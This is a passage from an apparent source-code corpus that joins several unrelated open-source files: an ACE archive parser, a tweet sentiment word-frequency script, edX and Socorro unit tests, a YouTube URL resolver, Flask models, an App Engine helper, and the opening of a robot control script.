module.exit_json(changed=changed)
except sdk.exceptions.OpenStackCloudException as e:
module.fail_json(msg=str(e))
if __name__ == "__main__":
main()
| gpl-3.0 |
elit3ge/SickRage | lib/hachoir_parser/archive/ace.py | 95 | 9944 | """
ACE parser
From wotsit.org and the SDK header (bitflags)
Partial study of a new block type (5) I've called "new_recovery", as its
syntax is very close to the former one (of type 2).
Status: can only read totally file and header blocks.
Author: Christophe Gisquet <christophe.gisquet@free.fr>
Creation date: 19 january 2006
"""
from hachoir_parser import Parser
from hachoir_core.field import (StaticFieldSet, FieldSet,
Bit, Bits, NullBits, RawBytes, Enum,
UInt8, UInt16, UInt32,
PascalString8, PascalString16, String,
TimeDateMSDOS32)
from hachoir_core.text_handler import textHandler, filesizeHandler, hexadecimal
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_parser.common.msdos import MSDOSFileAttr32
MAGIC = "**ACE**"
OS_MSDOS = 0
OS_WIN32 = 2
HOST_OS = {
0: "MS-DOS",
1: "OS/2",
2: "Win32",
3: "Unix",
4: "MAC-OS",
5: "Win NT",
6: "Primos",
7: "APPLE GS",
8: "ATARI",
9: "VAX VMS",
10: "AMIGA",
11: "NEXT",
}
COMPRESSION_TYPE = {
0: "Store",
1: "Lempel-Ziv 77",
2: "ACE v2.0",
}
COMPRESSION_MODE = {
0: "fastest",
1: "fast",
2: "normal",
3: "good",
4: "best",
}
# TODO: Computing the CRC16 would also prove useful
#def markerValidate(self):
# return not self["extend"].value and self["signature"].value == MAGIC and \
# self["host_os"].value<12
class MarkerFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(Bit, "has_comment", "Whether the archive has a comment"),
(NullBits, "unused", 7, "Reserved bits"),
(Bit, "sfx", "SFX"),
(Bit, "limited_dict", "Junior SFX with 256K dictionary"),
(Bit, "multi_volume", "Part of a set of ACE archives"),
(Bit, "has_av_string", "This header holds an AV-string"),
(Bit, "recovery_record", "Recovery record preset"),
(Bit, "locked", "Archive is locked"),
(Bit, "solid", "Archive uses solid compression")
)
def markerFlags(self):
yield MarkerFlags(self, "flags", "Marker flags")
def markerHeader(self):
yield String(self, "signature", 7, "Signature")
yield UInt8(self, "ver_extract", "Version needed to extract archive")
yield UInt8(self, "ver_created", "Version used to create archive")
yield Enum(UInt8(self, "host_os", "OS where the files were compressed"), HOST_OS)
yield UInt8(self, "vol_num", "Volume number")
yield TimeDateMSDOS32(self, "time", "Date and time (MS DOS format)")
yield Bits(self, "reserved", 64, "Reserved size for future extensions")
flags = self["flags"]
if flags["has_av_string"].value:
yield PascalString8(self, "av_string", "AV String")
if flags["has_comment"].value:
size = filesizeHandler(UInt16(self, "comment_size", "Comment size"))
yield size
if size.value > 0:
yield RawBytes(self, "compressed_comment", size.value, \
"Compressed comment")
class FileFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(Bit, "has_comment", "Presence of file comment"),
(Bits, "unused", 10, "Unused bit flags"),
(Bit, "encrypted", "File encrypted with password"),
(Bit, "previous", "File continued from previous volume"),
(Bit, "next", "File continues on the next volume"),
(Bit, "solid", "File compressed using previously archived files")
)
def fileFlags(self):
yield FileFlags(self, "flags", "File flags")
def fileHeader(self):
yield filesizeHandler(UInt32(self, "compressed_size", "Size of the compressed file"))
yield filesizeHandler(UInt32(self, "uncompressed_size", "Uncompressed file size"))
yield TimeDateMSDOS32(self, "ftime", "Date and time (MS DOS format)")
if self["/header/host_os"].value in (OS_MSDOS, OS_WIN32):
yield MSDOSFileAttr32(self, "file_attr", "File attributes")
else:
yield textHandler(UInt32(self, "file_attr", "File attributes"), hexadecimal)
yield textHandler(UInt32(self, "file_crc32", "CRC32 checksum over the compressed file)"), hexadecimal)
yield Enum(UInt8(self, "compression_type", "Type of compression"), COMPRESSION_TYPE)
yield Enum(UInt8(self, "compression_mode", "Quality of compression"), COMPRESSION_MODE)
yield textHandler(UInt16(self, "parameters", "Compression parameters"), hexadecimal)
yield textHandler(UInt16(self, "reserved", "Reserved data"), hexadecimal)
# Filename
yield PascalString16(self, "filename", "Filename")
# Comment
if self["flags/has_comment"].value:
yield filesizeHandler(UInt16(self, "comment_size", "Size of the compressed comment"))
if self["comment_size"].value > 0:
yield RawBytes(self, "comment_data", self["comment_size"].value, "Comment data")
def fileBody(self):
size = self["compressed_size"].value
if size > 0:
yield RawBytes(self, "compressed_data", size, "Compressed data")
def fileDesc(self):
return "File entry: %s (%s)" % (self["filename"].value, self["compressed_size"].display)
def recoveryHeader(self):
yield filesizeHandler(UInt32(self, "rec_blk_size", "Size of recovery data"))
self.body_size = self["rec_blk_size"].size
yield String(self, "signature", 7, "Signature, normally '**ACE**'")
yield textHandler(UInt32(self, "relative_start",
"Relative start (to this block) of the data this block is mode of"),
hexadecimal)
yield UInt32(self, "num_blocks", "Number of blocks the data is split into")
yield UInt32(self, "size_blocks", "Size of these blocks")
yield UInt16(self, "crc16_blocks", "CRC16 over recovery data")
# size_blocks blocks of size size_blocks follow
# The ultimate data is the xor data of all those blocks
size = self["size_blocks"].value
for index in xrange(self["num_blocks"].value):
yield RawBytes(self, "data[]", size, "Recovery block %i" % index)
yield RawBytes(self, "xor_data", size, "The XOR value of the above data blocks")
def recoveryDesc(self):
return "Recovery block, size=%u" % self["body_size"].display
def newRecoveryHeader(self):
"""
This header is described nowhere
"""
if self["flags/extend"].value:
yield filesizeHandler(UInt32(self, "body_size", "Size of the unknown body following"))
self.body_size = self["body_size"].value
yield textHandler(UInt32(self, "unknown[]", "Unknown field, probably 0"),
hexadecimal)
yield String(self, "signature", 7, "Signature, normally '**ACE**'")
yield textHandler(UInt32(self, "relative_start",
"Offset (=crc16's) of this block in the file"), hexadecimal)
yield textHandler(UInt32(self, "unknown[]",
"Unknown field, probably 0"), hexadecimal)
class BaseFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(NullBits, "unused", 15, "Unused bit flags")
)
def parseFlags(self):
yield BaseFlags(self, "flags", "Unknown flags")
def parseHeader(self):
if self["flags/extend"].value:
yield filesizeHandler(UInt32(self, "body_size", "Size of the unknown body following"))
self.body_size = self["body_size"].value
def parseBody(self):
if self.body_size > 0:
yield RawBytes(self, "body_data", self.body_size, "Body data, unhandled")
class Block(FieldSet):
TAG_INFO = {
0: ("header", "Archiver header", markerFlags, markerHeader, None),
1: ("file[]", fileDesc, fileFlags, fileHeader, fileBody),
2: ("recovery[]", recoveryDesc, recoveryHeader, None, None),
5: ("new_recovery[]", None, None, newRecoveryHeader, None)
}
def __init__(self, parent, name, description=None):
FieldSet.__init__(self, parent, name, description)
self.body_size = 0
self.desc_func = None
type = self["block_type"].value
if type in self.TAG_INFO:
self._name, desc, self.parseFlags, self.parseHeader, self.parseBody = self.TAG_INFO[type]
if desc:
if isinstance(desc, str):
self._description = desc
else:
self.desc_func = desc
else:
self.warning("Processing as unknown block block of type %u" % type)
if not self.parseFlags:
self.parseFlags = parseFlags
if not self.parseHeader:
self.parseHeader = parseHeader
if not self.parseBody:
self.parseBody = parseBody
def createFields(self):
yield textHandler(UInt16(self, "crc16", "Archive CRC16 (from byte 4 on)"), hexadecimal)
yield filesizeHandler(UInt16(self, "head_size", "Block size (from byte 4 on)"))
yield UInt8(self, "block_type", "Block type")
# Flags
for flag in self.parseFlags(self):
yield flag
# Rest of the header
for field in self.parseHeader(self):
yield field
size = self["head_size"].value - (self.current_size//8) + (2+2)
if size > 0:
yield RawBytes(self, "extra_data", size, "Extra header data, unhandled")
# Body in itself
for field in self.parseBody(self):
yield field
def createDescription(self):
if self.desc_func:
return self.desc_func(self)
else:
return "Block: %s" % self["type"].display
class AceFile(Parser):
endian = LITTLE_ENDIAN
PARSER_TAGS = {
"id": "ace",
"category": "archive",
"file_ext": ("ace",),
"mime": (u"application/x-ace-compressed",),
"min_size": 50*8,
"description": "ACE archive"
}
def validate(self):
if self.stream.readBytes(7*8, len(MAGIC)) != MAGIC:
return "Invalid magic"
return True
def createFields(self):
while not self.eof:
yield Block(self, "block[]")
| gpl-3.0 |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
def bigram(frases,vet_neg, vet_neu,vet_pos):
bi_neg = []
bi_neu = []
bi_pos = []
for f in frases:
if f.find()
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 |
andyzsf/edx | lms/djangoapps/instructor_task/tests/test_tasks_helper.py | 9 | 4496 | """
Unit tests for LMS instructor-initiated background tasks helper functions.
Tests that CSV grade report generation works with unicode emails.
"""
import ddt
from mock import Mock, patch
from django.test.testcases import TestCase
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from instructor_task.models import ReportStore
from instructor_task.tasks_helper import upload_grades_csv, upload_students_csv
from instructor_task.tests.test_base import InstructorTaskCourseTestCase, TestReportMixin
@ddt.ddt
class TestInstructorGradeReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV grade report generation works.
"""
def setUp(self):
self.course = CourseFactory.create()
@ddt.data([u'student@example.com', u'ni\xf1o@example.com'])
def test_unicode_emails(self, emails):
"""
Test that students with unicode characters in emails is handled.
"""
for i, email in enumerate(emails):
self.create_student('student{0}'.format(i), email)
self.current_task = Mock()
self.current_task.update_state = Mock()
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
num_students = len(emails)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
@patch('instructor_task.tasks_helper._get_current_task')
@patch('instructor_task.tasks_helper.iterate_grades_for')
def test_grading_failure(self, mock_iterate_grades_for, _mock_current_task):
"""
Test that any grading errors are properly reported in the
progress dict and uploaded to the report store.
"""
# mock an error response from `iterate_grades_for`
mock_iterate_grades_for.return_value = [
(self.create_student('username', 'student@example.com'), {}, 'Cannot grade student')
]
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
report_store = ReportStore.from_config()
self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))
@ddt.ddt
class TestStudentReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV student profile report generation works.
"""
def setUp(self):
self.course = CourseFactory.create()
def test_success(self):
self.create_student('student', 'student@example.com')
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
report_store = ReportStore.from_config()
links = report_store.links_for(self.course.id)
self.assertEquals(len(links), 1)
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
@ddt.data([u'student', u'student\xec'])
def test_unicode_usernames(self, students):
"""
Test that students with unicode characters in their usernames
are handled.
"""
for i, student in enumerate(students):
self.create_student(username=student, email='student{0}@example.com'.format(i))
self.current_task = Mock()
self.current_task.update_state = Mock()
task_input = {
'features': [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals'
]
}
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
#This assertion simply confirms that the generation completed with no errors
num_students = len(students)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
| agpl-3.0 |
joolswills/plugin.video.youtube | resources/lib/youtube/helper/url_resolver.py | 24 | 6617 | import re
__author__ = 'bromix'
import urlparse
from resources.lib.kodion.utils import FunctionCache
import resources.lib.kodion.simple_requests as requests
class AbstractResolver(object):
def __init__(self):
pass
def supports_url(self, url, url_components):
raise NotImplementedError()
def resolve(self, url, url_components):
raise NotImplementedError()
pass
class YouTubeResolver(AbstractResolver):
RE_USER_NAME = re.compile(r'http(s)?://(www.)?youtube.com/(?P<user_name>[a-zA-Z0-9]+)$')
def __init__(self):
AbstractResolver.__init__(self)
pass
def supports_url(self, url, url_components):
if url_components.hostname == 'www.youtube.com' or url_components.hostname == 'youtube.com':
if url_components.path.lower() in ['/redirect', '/user']:
return True
if url_components.path.lower().startswith('/user'):
return True
re_match = self.RE_USER_NAME.match(url)
if re_match:
return True
pass
return False
def resolve(self, url, url_components):
def _load_page(_url):
# we try to extract the channel id from the html content. With the channel id we can construct a url we
# already work with.
# https://www.youtube.com/channel/<CHANNEL_ID>
try:
headers = {'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36',
'DNT': '1',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8,de;q=0.6'}
response = requests.get(url, headers=headers)
if response.status_code == 200:
re_match = re.search(r'<meta itemprop="channelId" content="(?P<channel_id>.+)">', response.text)
if re_match:
channel_id = re_match.group('channel_id')
return 'https://www.youtube.com/channel/%s' % channel_id
pass
except:
# do nothing
pass
return _url
if url_components.path.lower() == '/redirect':
params = dict(urlparse.parse_qsl(url_components.query))
return params['q']
if url_components.path.lower().startswith('/user'):
return _load_page(url)
re_match = self.RE_USER_NAME.match(url)
if re_match:
return _load_page(url)
return url
pass
class CommonResolver(AbstractResolver, list):
def __init__(self):
AbstractResolver.__init__(self)
pass
def supports_url(self, url, url_components):
return True
def resolve(self, url, url_components):
def _loop(_url, tries=5):
if tries == 0:
return _url
try:
headers = {'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36',
'DNT': '1',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8,de;q=0.6'}
response = requests.head(_url, headers=headers, allow_redirects=False)
if response.status_code == 304:
return url
if response.status_code in [301, 302, 303]:
headers = response.headers
location = headers.get('location', '')
# validate the location - some server returned garbage
_url_components = urlparse.urlparse(location)
if not _url_components.scheme and not _url_components.hostname:
return url
# some server return 301 for HEAD requests
# we just compare the new location - if it's equal we can return the url
if location == _url or location + '/' == _url or location == _url + '/':
return _url
if location:
return _loop(location, tries=tries - 1)
# just to be sure ;)
location = headers.get('Location', '')
if location:
return _loop(location, tries=tries - 1)
pass
except:
# do nothing
pass
return _url
resolved_url = _loop(url)
return resolved_url
pass
class UrlResolver(object):
def __init__(self, context):
self._context = context
self._cache = {}
self._youtube_resolver = YouTubeResolver()
self._resolver = [
self._youtube_resolver,
CommonResolver()
]
pass
def clear(self):
self._context.get_function_cache().clear()
pass
def _resolve(self, url):
# try one of the resolver
url_components = urlparse.urlparse(url)
for resolver in self._resolver:
if resolver.supports_url(url, url_components):
resolved_url = resolver.resolve(url, url_components)
self._cache[url] = resolved_url
# one last check...sometimes the resolved url is YouTube-specific and can be resolved again or
# simplified.
url_components = urlparse.urlparse(resolved_url)
if resolver is not self._youtube_resolver and self._youtube_resolver.supports_url(resolved_url,
url_components):
return self._youtube_resolver.resolve(resolved_url, url_components)
return resolved_url
pass
pass
def resolve(self, url):
function_cache = self._context.get_function_cache()
resolved_url = function_cache.get(FunctionCache.ONE_DAY, self._resolve, url)
if not resolved_url or resolved_url == '/':
return url
return resolved_url
pass
| gpl-2.0 |
adngdb/socorro | socorro/unittest/cron/jobs/test_bugzilla.py | 3 | 8870 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pytest
import requests_mock
from crontabber.app import CronTabber
from socorro.cron.jobs.bugzilla import find_signatures
from socorro.cron.jobs.bugzilla import BUGZILLA_BASE_URL
from socorro.unittest.cron.setup_configman import (
get_config_manager_for_crontabber,
)
from socorro.unittest.cron.jobs.base import IntegrationTestBase
SAMPLE_BUGZILLA_RESULTS = {
'bugs': [
{
'id': '1',
'cf_crash_signature': 'This sig, while bogus, has a ] bracket',
},
{
'id': '2',
'cf_crash_signature': 'single [@ BogusClass::bogus_sig (const char**) ] signature',
},
{
'id': '3',
'cf_crash_signature': '[@ js3250.dll@0x6cb96] [@ valid.sig@0x333333]',
},
{
'id': '4',
'cf_crash_signature': '[@ layers::Push@0x123456] [@ layers::Push@0x123456]',
},
{
'id': '5',
'cf_crash_signature': (
'[@ MWSBAR.DLL@0x2589f] and a broken one [@ sadTrombone.DLL@0xb4s455'
),
},
{
'id': '6',
'cf_crash_signature': '',
},
{
'id': '7',
'cf_crash_signature': '[@gfx::font(nsTArray<nsRefPtr<FontEntry> > const&)]',
},
{
'id': '8',
'cf_crash_signature': '[@ legitimate(sig)] \n junk \n [@ another::legitimate(sig) ]',
},
{
'id': '42',
},
]
}
@requests_mock.Mocker()
class IntegrationTestBugzilla(IntegrationTestBase):
def tearDown(self):
self.conn.cursor().execute("TRUNCATE bug_associations CASCADE")
self.conn.commit()
super(IntegrationTestBugzilla, self).tearDown()
def _setup_config_manager(self, days_into_past):
return get_config_manager_for_crontabber(
jobs='socorro.cron.jobs.bugzilla.BugzillaCronApp|1d',
overrides={
'crontabber.class-BugzillaCronApp.days_into_past': days_into_past,
}
)
def test_basic_run_job(self, requests_mocker):
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor = self.conn.cursor()
cursor.execute('select bug_id from bug_associations order by bug_id')
associations = cursor.fetchall()
# Verify we have the expected number of associations.
assert len(associations) == 8
bug_ids = [x[0] for x in associations]
# Verify bugs with no crash signatures are missing.
assert 6 not in bug_ids
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# New signatures have correctly been inserted.
assert len(associations) == 2
assert ('another::legitimate(sig)',) in associations
assert ('legitimate(sig)',) in associations
def test_run_job_with_reports_with_existing_bugs_different(self, requests_mocker):
"""Verify that an association to a signature that no longer is part
of the crash signatures list gets removed.
"""
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
cursor = self.conn.cursor()
cursor.execute("""
insert into bug_associations (bug_id, signature)
values (8, '@different');
""")
self.conn.commit()
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# The previous association, to signature '@different' that is not in
# crash signatures, is now missing.
assert ('@different',) not in associations
def test_run_job_with_reports_with_existing_bugs_same(self, requests_mocker):
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
cursor = self.conn.cursor()
cursor.execute("""
insert into bug_associations (bug_id, signature)
values (8, 'legitimate(sig)');
""")
self.conn.commit()
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# New signatures have correctly been inserted.
assert len(associations) == 2
assert ('another::legitimate(sig)',) in associations
assert ('legitimate(sig)',) in associations
def test_run_job_based_on_last_success(self, requests_mocker):
"""specifically setting 0 days back and no prior run
will pick it up from now's date"""
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(0)
cursor = self.conn.cursor()
# these are matching the SAMPLE_CSV above
cursor.execute("""insert into bug_associations
(bug_id,signature)
values
(8, 'legitimate(sig)');
""")
self.conn.commit()
# second time
config_manager = self._setup_config_manager(0)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
state = tab.job_state_database.copy()
self._wind_clock(state, days=1)
tab.job_state_database.update(state)
# Create a CSV file for one day back.
# This'll make sure there's a .csv file whose day
# is that of the last run.
self._setup_config_manager(1)
config_manager = self._setup_config_manager(0)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
def test_with_bugzilla_failure(self, requests_mocker):
requests_mocker.get(
BUGZILLA_BASE_URL,
text='error loading content',
status_code=500
)
config_manager = self._setup_config_manager(3)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
# There has been an error.
last_error = information['bugzilla-associations']['last_error']
assert last_error
assert 'HTTPError' in last_error['type']
assert not information['bugzilla-associations']['last_success']
@pytest.mark.parametrize('content, expected', [
# Simple signature
('[@ moz::signature]', set(['moz::signature'])),
# Using unicode.
(u'[@ moz::signature]', set(['moz::signature'])),
# 2 signatures and some junk
(
'@@3*&^!~[@ moz::signature][@ ns::old ]',
set(['moz::signature', 'ns::old'])
),
# A signature containing square brackets.
(
'[@ moz::signature] [@ sig_with[brackets]]',
set(['moz::signature', 'sig_with[brackets]'])
),
# A malformed signature.
('[@ note there is no trailing bracket', set()),
])
def test_find_signatures(content, expected):
assert find_signatures(content) == expected
| mpl-2.0 |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
@property
def __repr__(self):
return self.group_name
| mit |
robertkohl125/ConferenceCentral | utils.py | 384 | 1576 | import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from models import Profile
def getUserId(user, id_type="email"):
if id_type == "email":
return user.email()
if id_type == "oauth":
"""A workaround implementation for getting userid."""
auth = os.getenv('HTTP_AUTHORIZATION')
bearer, token = auth.split()
token_type = 'id_token'
if 'OAUTH_USER_ID' in os.environ:
token_type = 'access_token'
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% (token_type, token))
user = {}
wait = 1
for i in range(3):
resp = urlfetch.fetch(url)
if resp.status_code == 200:
user = json.loads(resp.content)
break
elif resp.status_code == 400 and 'invalid_token' in resp.content:
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% ('access_token', token))
else:
time.sleep(wait)
wait = wait + i
return user.get('user_id', '')
if id_type == "custom":
# implement your own user_id creation and getting algorythm
# this is just a sample that queries datastore for an existing profile
# and generates an id if profile does not exist for an email
profile = Conference.query(Conference.mainEmail == user.email())
if profile:
return profile.id()
else:
return str(uuid.uuid1().get_hex())
| apache-2.0 |
gbwebdev/PFE-VA_Dev | components/abort.py | 2 | 3363 | """
abort.py
Abort all operations
"""
#!/usr/bin/python3.5
#-*- coding: utf-8 -*-
###Standard imports :
#import atexit
from os import path
###Specific imports :
##robotBasics:
#Constants:
from robotBasics.constants import gpiodef as GPIODEF
from robotBasics.constants.gpiodef import LEDS as LEDS_GPIO
from robotBasics.constants.gpiodef import LEDS_PINS as LEDS_PINS
#Classes & Methods:
from robotBasics.logger import robotLogger
###########################################################################
# Environment Setup : #
###########################################################################
#If we are on an actual robot :
if path.isdir("/home/robot"):
ROBOT_ROOT = '/home/robot/'
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
elif path.isfile(path.expanduser('~/.robotConf')):
#If we're not on an actual robot, check if we have
#a working environment set for robot debugging:
CONFIG_FILE = open(path.expanduser('~/.robotConf'), 'r')
ROBOT_ROOT = CONFIG_FILE.read().strip()
CONFIG_FILE.close()
import Adafruit_BBIO_SIM.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
#Simulator setup
